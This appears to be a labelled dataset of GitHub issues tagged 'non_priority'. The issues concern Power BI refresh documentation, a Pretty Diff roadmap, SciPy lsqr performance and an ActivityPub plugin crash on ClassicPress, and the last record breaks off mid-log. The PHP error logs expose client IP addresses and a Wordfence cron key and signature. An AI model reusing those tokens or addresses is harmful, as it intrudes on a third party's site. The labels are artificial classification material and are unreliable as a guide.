At paragraph https://docs.microsoft.com/en-us/power-bi/refresh-data#data-refresh it says (which is correct in my opinion): On-demand refreshes are not included in the refresh limitation. But in paragraph https://docs.microsoft.com/en-us/power-bi/refresh-data#configure-scheduled-refresh it says: On-demand refreshes don't affect the next scheduled refresh time, but they count against the daily refresh limit, as explained earlier in this article. This last statement is not correct. --- #### Document Details ⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.* * ID: ce280443-0aa3-da51-f71d-ff7c1704b268 * Version Independent ID: 8122662c-44c4-317d-ef45-44bd3f204487 * Content: [Data refresh in Power BI - Power BI](https://docs.microsoft.com/en-us/power-bi/refresh-data#configure-scheduled-refresh) * Content Source: [powerbi-docs/refresh-data.md](https://github.com/MicrosoftDocs/powerbi-docs/blob/live/powerbi-docs/refresh-data.md) * Service: **powerbi** * Sub-service: **powerbi-service** * GitHub Login: @mgblythe * Microsoft Alias: **mblythe**
1.0
On-demand refresh incorrectly mentioned - At paragraph https://docs.microsoft.com/en-us/power-bi/refresh-data#data-refresh it says (which is correct in my opinion): On-demand refreshes are not included in the refresh limitation. But in paragraph https://docs.microsoft.com/en-us/power-bi/refresh-data#configure-scheduled-refresh it says: On-demand refreshes don't affect the next scheduled refresh time, but they count against the daily refresh limit, as explained earlier in this article. This last statement is not correct. --- #### Document Details ⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.* * ID: ce280443-0aa3-da51-f71d-ff7c1704b268 * Version Independent ID: 8122662c-44c4-317d-ef45-44bd3f204487 * Content: [Data refresh in Power BI - Power BI](https://docs.microsoft.com/en-us/power-bi/refresh-data#configure-scheduled-refresh) * Content Source: [powerbi-docs/refresh-data.md](https://github.com/MicrosoftDocs/powerbi-docs/blob/live/powerbi-docs/refresh-data.md) * Service: **powerbi** * Sub-service: **powerbi-service** * GitHub Login: @mgblythe * Microsoft Alias: **mblythe**
non_priority
on demand refresh incorrectly mentioned at paragraph it says which is correct in my opinion on demand refreshes are not included in the refresh limitation but in paragraph it says on demand refreshes don t affect the next scheduled refresh time but they count against the daily refresh limit as explained earlier in this article this last statement is not correct document details ⚠ do not edit this section it is required for docs microsoft com ➟ github issue linking id version independent id content content source service powerbi sub service powerbi service github login mgblythe microsoft alias mblythe
0
2,656
8,120,269,630
IssuesEvent
2018-08-16 01:41:39
prettydiff/prettydiff
https://api.github.com/repos/prettydiff/prettydiff
closed
Pretty Diff 3 roadmap
3.0.0 Announcement Architecture Underway
# Pretty Diff 3 is coming ## Current technical objectives * #459 - Rewrite api/node-local.js file to take advantage of smaller, faster, more precise logic from side project, biddle * #458 - Consolidate the application back into a single file. The two api files will remain separate, but everything else will be consolidated into a single massive monster file. To make this less intimidating I will be externalizing things upon request: - I will provide a convention so that any function can be exposed by name. If you want a parser just ask the application for it by name and it will expose what you need. - Expose any array that comprised part of a parse table. This stuff should be available at any time without having to dive into the code. - Options settings and values should be exposed as a JSON object upon request so that if something is acting strange anybody can see if it is the result of settings versus an application failure * Although Pretty Diff will be served as a single application file. The ability to export functions must allow for a write or import method so that these exported function can be overwritten with modifications. This is essential because I want to rip the parsers out and host them as a separate independent git repository to start a universal parsing framework. For more information see https://github.com/Unibeautify/unibeautify/issues/8#issuecomment-310282589 * #454 - Provide a single standard option to define output format that works across all features of the entire project * Revise the UI on the webtool. I am happy with the UI until you get to the options at which point it is atrocious. There will not be options per mode, but only a single set of options that will be available per request with appropriate documentation ## NPM and Unibeautify I am considering putting Pretty Diff back into NPM once this milestone is completed. NPM is faster now, more stable, and they have introduced hashing for integrity. There instability around package.json files with regard to redistribution still seems present, the computation around the NPM download counts remains unclear, and I still think the package namespace is a bottleneck with consequences beyond distribution problems. My primary motivation is to move the unibeautify project forward. My biggest concern with NPM, looking forward though, is that a package cannot be published in various forms or limitations. Pretty Diff, for example is a big project, with a weight around 24mb. All the logic to run the application from the command line is only about 1.1mb. I have users who wish to play around with the options on the webtool that runs in a browser. I have users that want to run the unit tests to verify stability or hack around the code. I have users that want to run the bare minimum code on the command line for integration or bundling with other applications. I cannot make them all happy with NPM unless I replicate the project on my side and publish as various different packages. This is a huge pain the ass could be easily configured in the package.json file. ## Tentative plan 1. Rewrite api/node-local.js. This work will be less intimidating than #458 and can occur in a vacuum. 2. Integrate the lib/options.js into the prettydiff.js file first. Options handling is foundation of the application's architecture and all further organizational decisions must draw from that foundation. 3. Integrate the actual language parsers into the prettydiff.js file at the same time. The largest challenge will be resource sharing (closures) while simultaneously accounting for inter-parser recursion like JSX. 4. Step by step integrate all supporting logic for beautification, code formatting, analysis and so forth 5. Account for output formats and write unit tests for this in support of #454 6. Validate application and project health 7. Add logic to expose all functions by request and as much internal data and settings as possible 8. Removing current options support from the web tool and rebuild this for uniformity and simplicity 9. Evaluate steps for getting Pretty Diff into NPM as various different packages
1.0
Pretty Diff 3 roadmap - # Pretty Diff 3 is coming ## Current technical objectives * #459 - Rewrite api/node-local.js file to take advantage of smaller, faster, more precise logic from side project, biddle * #458 - Consolidate the application back into a single file. The two api files will remain separate, but everything else will be consolidated into a single massive monster file. To make this less intimidating I will be externalizing things upon request: - I will provide a convention so that any function can be exposed by name. If you want a parser just ask the application for it by name and it will expose what you need. - Expose any array that comprised part of a parse table. This stuff should be available at any time without having to dive into the code. - Options settings and values should be exposed as a JSON object upon request so that if something is acting strange anybody can see if it is the result of settings versus an application failure * Although Pretty Diff will be served as a single application file. The ability to export functions must allow for a write or import method so that these exported function can be overwritten with modifications. This is essential because I want to rip the parsers out and host them as a separate independent git repository to start a universal parsing framework. For more information see https://github.com/Unibeautify/unibeautify/issues/8#issuecomment-310282589 * #454 - Provide a single standard option to define output format that works across all features of the entire project * Revise the UI on the webtool. I am happy with the UI until you get to the options at which point it is atrocious. There will not be options per mode, but only a single set of options that will be available per request with appropriate documentation ## NPM and Unibeautify I am considering putting Pretty Diff back into NPM once this milestone is completed. NPM is faster now, more stable, and they have introduced hashing for integrity. There instability around package.json files with regard to redistribution still seems present, the computation around the NPM download counts remains unclear, and I still think the package namespace is a bottleneck with consequences beyond distribution problems. My primary motivation is to move the unibeautify project forward. My biggest concern with NPM, looking forward though, is that a package cannot be published in various forms or limitations. Pretty Diff, for example is a big project, with a weight around 24mb. All the logic to run the application from the command line is only about 1.1mb. I have users who wish to play around with the options on the webtool that runs in a browser. I have users that want to run the unit tests to verify stability or hack around the code. I have users that want to run the bare minimum code on the command line for integration or bundling with other applications. I cannot make them all happy with NPM unless I replicate the project on my side and publish as various different packages. This is a huge pain the ass could be easily configured in the package.json file. ## Tentative plan 1. Rewrite api/node-local.js. This work will be less intimidating than #458 and can occur in a vacuum. 2. Integrate the lib/options.js into the prettydiff.js file first. Options handling is foundation of the application's architecture and all further organizational decisions must draw from that foundation. 3. Integrate the actual language parsers into the prettydiff.js file at the same time. The largest challenge will be resource sharing (closures) while simultaneously accounting for inter-parser recursion like JSX. 4. Step by step integrate all supporting logic for beautification, code formatting, analysis and so forth 5. Account for output formats and write unit tests for this in support of #454 6. Validate application and project health 7. Add logic to expose all functions by request and as much internal data and settings as possible 8. Removing current options support from the web tool and rebuild this for uniformity and simplicity 9. Evaluate steps for getting Pretty Diff into NPM as various different packages
non_priority
pretty diff roadmap pretty diff is coming current technical objectives rewrite api node local js file to take advantage of smaller faster more precise logic from side project biddle consolidate the application back into a single file the two api files will remain separate but everything else will be consolidated into a single massive monster file to make this less intimidating i will be externalizing things upon request i will provide a convention so that any function can be exposed by name if you want a parser just ask the application for it by name and it will expose what you need expose any array that comprised part of a parse table this stuff should be available at any time without having to dive into the code options settings and values should be exposed as a json object upon request so that if something is acting strange anybody can see if it is the result of settings versus an application failure although pretty diff will be served as a single application file the ability to export functions must allow for a write or import method so that these exported function can be overwritten with modifications this is essential because i want to rip the parsers out and host them as a separate independent git repository to start a universal parsing framework for more information see provide a single standard option to define output format that works across all features of the entire project revise the ui on the webtool i am happy with the ui until you get to the options at which point it is atrocious there will not be options per mode but only a single set of options that will be available per request with appropriate documentation npm and unibeautify i am considering putting pretty diff back into npm once this milestone is completed npm is faster now more stable and they have introduced hashing for integrity there instability around package json files with regard to redistribution still seems present the computation around the npm download counts remains unclear and i still think the package namespace is a bottleneck with consequences beyond distribution problems my primary motivation is to move the unibeautify project forward my biggest concern with npm looking forward though is that a package cannot be published in various forms or limitations pretty diff for example is a big project with a weight around all the logic to run the application from the command line is only about i have users who wish to play around with the options on the webtool that runs in a browser i have users that want to run the unit tests to verify stability or hack around the code i have users that want to run the bare minimum code on the command line for integration or bundling with other applications i cannot make them all happy with npm unless i replicate the project on my side and publish as various different packages this is a huge pain the ass could be easily configured in the package json file tentative plan rewrite api node local js this work will be less intimidating than and can occur in a vacuum integrate the lib options js into the prettydiff js file first options handling is foundation of the application s architecture and all further organizational decisions must draw from that foundation integrate the actual language parsers into the prettydiff js file at the same time the largest challenge will be resource sharing closures while simultaneously accounting for inter parser recursion like jsx step by step integrate all supporting logic for beautification code formatting analysis and so forth account for output formats and write unit tests for this in support of validate application and project health add logic to expose all functions by request and as much internal data and settings as possible removing current options support from the web tool and rebuild this for uniformity and simplicity evaluate steps for getting pretty diff into npm as various different packages
0
74,061
24,925,821,834
IssuesEvent
2022-10-31 07:14:41
scipy/scipy
https://api.github.com/repos/scipy/scipy
opened
BUG: slower performance of lsqr on linux than windows
defect
### Describe your issue. Hello, I have come across some curious behavior. I am using `scipy.sparse.linalg.lsqr`, and have noticed that it is around twice as slow on linux (ubuntu 20.04) as on windows 10. This is on identical hardware. - Below is a code snippet to reproduce. This relies on [pynufft](https://jyhmiinlin.github.io/pynufft/index.html) - I've attached cProfile profiles of this code on windows and linux (update: no i haven't I don't think I can?). These indicate that 201 calls are made to `scipy.sparse.linalg._isolve.iterative`, and each of these calls takes around twice as long on linux as on windows. - I originally thought it was the NUFFT library, but I have reproduced this behavior with two different libraries. It just seems odd to me. If it was the other way around and windows was slower I would be less surprised. ### Reproducing Code Example ```python import numpy as np from scipy.sparse.linalg import lsqr from scipy.sparse.linalg import LinearOperator from scipy.fft import fft2 from scipy.fft import fftshift from time import perf_counter, sleep from pynufft import NUFFT, helper def PyNufft_Ax(x): y = Nufft_Ax_Plan.solve(x, solver='cg', maxiter=50) return y def PyNufft_Atb(x): y = Nufft_Ax_Plan.adjoint(x) return y # set up random image StartingImage = np.random.rand(148, 148) Nrows = StartingImage.shape[0] Ncolumns = StartingImage.shape[0] StartingImage[StartingImage > 0.5] = 100 k_space = fftshift(fft2(fftshift(StartingImage))) fk1 = np.reshape(k_space, StartingImage.shape[0] * StartingImage.shape[1]) # set up indices x_lin_size, y_lin_size = (148, 148) xn_lin = np.linspace(-x_lin_size / 2, -x_lin_size / 2 + x_lin_size - 1, x_lin_size) yn_lin = np.linspace(-y_lin_size / 2, -y_lin_size / 2 + y_lin_size - 1, y_lin_size) [xn_lin, yn_lin] = np.meshgrid(xn_lin, yn_lin, indexing='ij') xn_lin = xn_lin.flatten() yn_lin = yn_lin.flatten() ''' the following is just a very hacky way to get some distorted indices which somehwat resemble the real case ''' xj = (xn_lin + np.sin(xn_lin)*5)*10 yj = (yn_lin + np.sin(yn_lin)*5)*10 sk = xn_lin / x_lin_size tk = yn_lin / y_lin_size yn_dis = yj/(2*np.pi) xn_dis = xj/(2*np.pi) #instantiate plan # Nufft_Ax_Plan = NUFFT(helper.device_list()[0]) Nufft_Ax_Plan = NUFFT() Kx_dis_pytorch = np.reshape(xn_dis,[Nrows, Ncolumns]) / Nrows * 2 * np.pi # [-pi, pi] Ky_dis_pytorch = np.reshape(yn_dis,[Nrows, Ncolumns]) / Ncolumns * 2 * np.pi indede = 0 k_xy_dis = np.zeros([Nrows * Ncolumns, 2]) for i in range(Nrows): for j in range(Ncolumns): k_xy_dis[indede, 0] = Kx_dis_pytorch[i, j] k_xy_dis[indede, 1] = Ky_dis_pytorch[i, j] indede = indede + 1 om = np.vstack([xj, yj]) Nd = StartingImage.shape # image size Kd = k_space.shape # kspace size Jd = (3, 3) # interpolation size Nufft_Ax_Plan.plan(k_xy_dis, Nd, Kd, Jd) A = LinearOperator((fk1.shape[0], fk1.shape[0]), matvec=dummy_Ax, rmatvec=dummmy_Atb) time = [] for i in range(10): _start_time = perf_counter() x1 = lsqr(A, fk1, iter_lim=20, x0=None) time.append(perf_counter() - _start_time) print(f'run time: {np.mean(time): 1.2f} \u00B1 {np.std(time): 1.2f}s') ``` ### Error message ```shell None ``` ### SciPy/NumPy/Python version information 1.9.2 1.23.4 sys.version_info(major=3, minor=9, micro=6, releaselevel='final', serial=0)
1.0
BUG: slower performance of lsqr on linux than windows - ### Describe your issue. Hello, I have come across some curious behavior. I am using `scipy.sparse.linalg.lsqr`, and have noticed that it is around twice as slow on linux (ubuntu 20.04) as on windows 10. This is on identical hardware. - Below is a code snippet to reproduce. This relies on [pynufft](https://jyhmiinlin.github.io/pynufft/index.html) - I've attached cProfile profiles of this code on windows and linux (update: no i haven't I don't think I can?). These indicate that 201 calls are made to `scipy.sparse.linalg._isolve.iterative`, and each of these calls takes around twice as long on linux as on windows. - I originally thought it was the NUFFT library, but I have reproduced this behavior with two different libraries. It just seems odd to me. If it was the other way around and windows was slower I would be less surprised. ### Reproducing Code Example ```python import numpy as np from scipy.sparse.linalg import lsqr from scipy.sparse.linalg import LinearOperator from scipy.fft import fft2 from scipy.fft import fftshift from time import perf_counter, sleep from pynufft import NUFFT, helper def PyNufft_Ax(x): y = Nufft_Ax_Plan.solve(x, solver='cg', maxiter=50) return y def PyNufft_Atb(x): y = Nufft_Ax_Plan.adjoint(x) return y # set up random image StartingImage = np.random.rand(148, 148) Nrows = StartingImage.shape[0] Ncolumns = StartingImage.shape[0] StartingImage[StartingImage > 0.5] = 100 k_space = fftshift(fft2(fftshift(StartingImage))) fk1 = np.reshape(k_space, StartingImage.shape[0] * StartingImage.shape[1]) # set up indices x_lin_size, y_lin_size = (148, 148) xn_lin = np.linspace(-x_lin_size / 2, -x_lin_size / 2 + x_lin_size - 1, x_lin_size) yn_lin = np.linspace(-y_lin_size / 2, -y_lin_size / 2 + y_lin_size - 1, y_lin_size) [xn_lin, yn_lin] = np.meshgrid(xn_lin, yn_lin, indexing='ij') xn_lin = xn_lin.flatten() yn_lin = yn_lin.flatten() ''' the following is just a very hacky way to get some distorted indices which somehwat resemble the real case ''' xj = (xn_lin + np.sin(xn_lin)*5)*10 yj = (yn_lin + np.sin(yn_lin)*5)*10 sk = xn_lin / x_lin_size tk = yn_lin / y_lin_size yn_dis = yj/(2*np.pi) xn_dis = xj/(2*np.pi) #instantiate plan # Nufft_Ax_Plan = NUFFT(helper.device_list()[0]) Nufft_Ax_Plan = NUFFT() Kx_dis_pytorch = np.reshape(xn_dis,[Nrows, Ncolumns]) / Nrows * 2 * np.pi # [-pi, pi] Ky_dis_pytorch = np.reshape(yn_dis,[Nrows, Ncolumns]) / Ncolumns * 2 * np.pi indede = 0 k_xy_dis = np.zeros([Nrows * Ncolumns, 2]) for i in range(Nrows): for j in range(Ncolumns): k_xy_dis[indede, 0] = Kx_dis_pytorch[i, j] k_xy_dis[indede, 1] = Ky_dis_pytorch[i, j] indede = indede + 1 om = np.vstack([xj, yj]) Nd = StartingImage.shape # image size Kd = k_space.shape # kspace size Jd = (3, 3) # interpolation size Nufft_Ax_Plan.plan(k_xy_dis, Nd, Kd, Jd) A = LinearOperator((fk1.shape[0], fk1.shape[0]), matvec=dummy_Ax, rmatvec=dummmy_Atb) time = [] for i in range(10): _start_time = perf_counter() x1 = lsqr(A, fk1, iter_lim=20, x0=None) time.append(perf_counter() - _start_time) print(f'run time: {np.mean(time): 1.2f} \u00B1 {np.std(time): 1.2f}s') ``` ### Error message ```shell None ``` ### SciPy/NumPy/Python version information 1.9.2 1.23.4 sys.version_info(major=3, minor=9, micro=6, releaselevel='final', serial=0)
non_priority
bug slower performance of lsqr on linux than windows describe your issue hello i have come across some curious behavior i am using scipy sparse linalg lsqr and have noticed that it is around twice as slow on linux ubuntu as on windows this is on identical hardware below is a code snippet to reproduce this relies on i ve attached cprofile profiles of this code on windows and linux update no i haven t i don t think i can these indicate that calls are made to scipy sparse linalg isolve iterative and each of these calls takes around twice as long on linux as on windows i originally thought it was the nufft library but i have reproduced this behavior with two different libraries it just seems odd to me if it was the other way around and windows was slower i would be less surprised reproducing code example python import numpy as np from scipy sparse linalg import lsqr from scipy sparse linalg import linearoperator from scipy fft import from scipy fft import fftshift from time import perf counter sleep from pynufft import nufft helper def pynufft ax x y nufft ax plan solve x solver cg maxiter return y def pynufft atb x y nufft ax plan adjoint x return y set up random image startingimage np random rand nrows startingimage shape ncolumns startingimage shape startingimage k space fftshift fftshift startingimage np reshape k space startingimage shape startingimage shape set up indices x lin size y lin size xn lin np linspace x lin size x lin size x lin size x lin size yn lin np linspace y lin size y lin size y lin size y lin size np meshgrid xn lin yn lin indexing ij xn lin xn lin flatten yn lin yn lin flatten the following is just a very hacky way to get some distorted indices which somehwat resemble the real case xj xn lin np sin xn lin yj yn lin np sin yn lin sk xn lin x lin size tk yn lin y lin size yn dis yj np pi xn dis xj np pi instantiate plan nufft ax plan nufft helper device list nufft ax plan nufft kx dis pytorch np reshape xn dis nrows np pi ky dis pytorch np reshape yn dis ncolumns np pi indede k xy dis np zeros for i in range nrows for j in range ncolumns k xy dis kx dis pytorch k xy dis ky dis pytorch indede indede om np vstack nd startingimage shape image size kd k space shape kspace size jd interpolation size nufft ax plan plan k xy dis nd kd jd a linearoperator shape shape matvec dummy ax rmatvec dummmy atb time for i in range start time perf counter lsqr a iter lim none time append perf counter start time print f run time np mean time np std time s error message shell none scipy numpy python version information sys version info major minor micro releaselevel final serial
0
84,562
24,346,305,002
IssuesEvent
2022-10-02 11:09:39
atk4/ui
https://api.github.com/repos/atk4/ui
closed
Add option to order elements inside a grid
help wanted JS Saasty.io :building_construction:
Currently you can take a Grid and make elements selectable with a relative ease: http://agile-ui.readthedocs.io/en/latest/grid.html?highlight=grid#selection It should be possible to produce grid order in a similar way. 1. Add a dragging handle for grid lines. 2. Provide an expression to fetch grid order `$ord->getOrder()` This should return list of IDs: 392,29,493 which can either be stored in a hidden form field or communicated to the backend through AJAX, that is outside of this ticket's scope.
1.0
Add option to order elements inside a grid - Currently you can take a Grid and make elements selectable with a relative ease: http://agile-ui.readthedocs.io/en/latest/grid.html?highlight=grid#selection It should be possible to produce grid order in a similar way. 1. Add a dragging handle for grid lines. 2. Provide an expression to fetch grid order `$ord->getOrder()` This should return list of IDs: 392,29,493 which can either be stored in a hidden form field or communicated to the backend through AJAX, that is outside of this ticket's scope.
non_priority
add option to order elements inside a grid currently you can take a grid and make elements selectable with a relative ease it should be possible to produce grid order in a similar way add a dragging handle for grid lines provide an expression to fetch grid order ord getorder this should return list of ids which can either be stored in a hidden form field or communicated to the backend through ajax that is outside of this ticket s scope
0
348,478
24,915,313,754
IssuesEvent
2022-10-30 10:28:59
CAFECA-IO/TideBitEx
https://api.github.com/repos/CAFECA-IO/TideBitEx
closed
[QA] Testcase 規劃 (2/3)
documentation 2
**規劃 to be verified 項目的 Test cases** 1. #912 2. #923 3. #924 4. #933 5. #937 6. #938 7. #939 8. #946 9. #948 10. #955 共 10 項 測試環境 https://test.tidebit.network/ 管理環境 https://test.tidebit.network/analysis
1.0
[QA] Testcase 規劃 (2/3) - **規劃 to be verified 項目的 Test cases** 1. #912 2. #923 3. #924 4. #933 5. #937 6. #938 7. #939 8. #946 9. #948 10. #955 共 10 項 測試環境 https://test.tidebit.network/ 管理環境 https://test.tidebit.network/analysis
non_priority
testcase 規劃 規劃 to be verified 項目的 test cases 共 項 測試環境 管理環境
0
20,982
31,857,650,831
IssuesEvent
2023-09-15 08:38:49
Automattic/wordpress-activitypub
https://api.github.com/repos/Automattic/wordpress-activitypub
closed
Plugin breaks ClassicPress
[Type] Bug [Status] In Progress [Focus] Compatibility
Yesterday (2023-09-13) I upgraded the plugin in my ClassicPress installation on blog.atari-frosch.de, and directly afterwards the blog only delivered empty pages. I had to delete the plugin on the shell (I'm hosting the stuff myself) so that the blog could start working correctly again. System: Devuan GNU/Linux 4 Chimaera Kernel: Linux seelilie 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux Webserver: nginx-full_1.18.0-6.1+deb11u3_all.deb PHP: PHP 7.4.33 with php7.4-fpm_7.4.33-1+deb11u3_amd64.deb This is what the error.log said after the update (2a01:4f8:150:81e4::2 is the server's IPv6 address): 2023/09/13 17:02:24 [error] 17262#17262: *694892 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: 178.63.18.4, server: blog.atari-frosch.de, request: "GET /status.php HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:02:37 [error] 17262#17262: *694964 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-cron.php(34): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/atarifrosch-blo" while reading response header from upstream, client: 2a01:4f8:150:81e4::2, server: blog.atari-frosch.de, request: "POST /wp-cron.php?doing_wp_cron=1694617357.0145969390869140625000 HTTP/1.1", upstream: "fas tcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/wp-cron.php?doing_wp_cron=1694617357.0145969390869140625000" 2023/09/13 17:02:37 [error] 17262#17262: *694962 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-admin/admin-ajax.php(22): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/ata" while reading response header from upstream, client: 44.235.211.232, server: blog.atari-frosch.de, request: "GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=0&scanMode=quick&cronKey=92986d278e1731d7d9c6382dadc82053&signature=d074f3ceead03583d4a5ea1e2ecc2f70375108a93e089b1b37a2b00ce487fde8&remote=1 HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:02:38 [error] 17262#17262: *694967 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-admin/admin-ajax.php(22): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/ata" while reading response header from upstream, client: 44.235.211.232, server: blog.atari-frosch.de, request: "GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=0&scanMode=quick&cronKey=92986d278e1731d7d9c6382dadc82053&signature=d074f3ceead03583d4a5ea1e2ecc2f70375108a93e089b1b37a2b00ce487fde8&remote=1 HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:02:42 [error] 17262#17262: *694935 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-admin/admin-ajax.php(22): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/ata" while reading response header from upstream, client: 109.90.207.33, server: blog.atari-frosch.de, request: "POST /wp-admin/admin-ajax.php HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.ata ri-frosch.de", referrer: "https://blog.atari-frosch.de/wp-admin/plugins.php" 2023/09/13 17:02:54 [error] 17262#17262: *695008 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-admin/admin.php(34): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/wp-admin/p" while reading response header from upstream, client: 109.90.207.33, server: blog.atari-frosch.de, request: "GET /wp-admin/plugins.php HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/wp-admin/plugins.php" 2023/09/13 17:03:14 [error] 17262#17262: *695060 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 109.90.207.33, server: blog.atari-frosch.de, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:03:39 [error] 17262#17262: *695104 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 